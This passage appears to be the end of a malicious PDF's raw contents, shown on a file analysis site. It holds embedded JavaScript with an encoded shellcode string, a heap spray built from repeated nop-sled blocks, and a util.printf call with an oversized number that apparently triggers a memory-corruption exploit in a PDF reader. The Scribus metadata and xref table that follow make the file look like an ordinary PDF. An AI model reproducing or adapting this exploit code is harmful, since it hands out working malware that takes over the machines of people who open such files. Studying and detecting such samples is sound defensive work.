"%uF5D6%u057D%u7D2C%u0D49%uF810%u5E35%uF2BC%u66E7" +
"%uF686%u8EBE%u3055%uDCB3%u0980%u72E9%u7D8C%uE466" +
"%uAFD7%uB356%uF6D6%u0DBE%uE510%uC8E8%uC856%uFB3E" +
"%u762C%u0E88%u7588%uAE52%u2A5D%uAED4%u0985%u62E9" +
"%uF211%uD2BD%uD8B7%u49DB%uF592%uF6BA%uF6B3%uBDBE" +
"%uA616%uDDEE%uA680%uD941%u7D2A%uDE62%u0985%u7EE9" +
"%u0986%u7AE9%u36E5%u0B12%u8316%uDF47%uA084%u71ED" +
"%uAC04%u25E7%u1834%u4E8D%u1E15%u7198%u0929%uEBF9" +
"%uA6A2%uE1CC%uB7B5%uEADA%u93A4%uFDCD%uB1D6%uFADB" +
"%u8F85%uFACD%u9BB3%uE7FA%u93A4%uFADD%u84B9%uCFC7" +
"%uA1D6%uE0D7%u8E93%uEDDB%uB3D6%uE7C6%uA2A2%uFCD6" +
"%u97B3%u8EDA%u999A%uEADF%u9F9A%uFCDC%u84B7%uCFC7" +
"%u83D6%uE2CC%u99BB%u8ED0%uA483%uCAF2%u81B9%uE2D0" +
"%u97B9%uDADA%uB0B9%uE2D7%uB7B3%u7FBE%u1B3B%u2D57" +
"%u4060%u7B46%u0A23%u674E%u413C%u7844%u4022%u7E41" +
"%u0A23%u3914%u172A%u9742");
var QtSX7FFMO5Yh=unescape("%u0"+"A0A%u"+"0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45"+"000f",gipW5Eb);
endstream
endobj
14 0 obj
<</Creator (Scribus 1.3.3.12)
/Title <>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)
>>
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000264 00000 n
0000000282 00000 n
0000000327 00000 n
0000000400 00000 n
0000000431 00000 n
0000000451 00000 n
0000000490 00000 n
0000000556 00000 n
0000000734 00000 n
0000000784 00000 n
0000000865 00000 n
0000000912 00000 n
0000006893 00000 n
trailer
<</Info 14 0 R
/Root 1 0 R
/Size 15
>>
startxref
7094
%%EOF
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.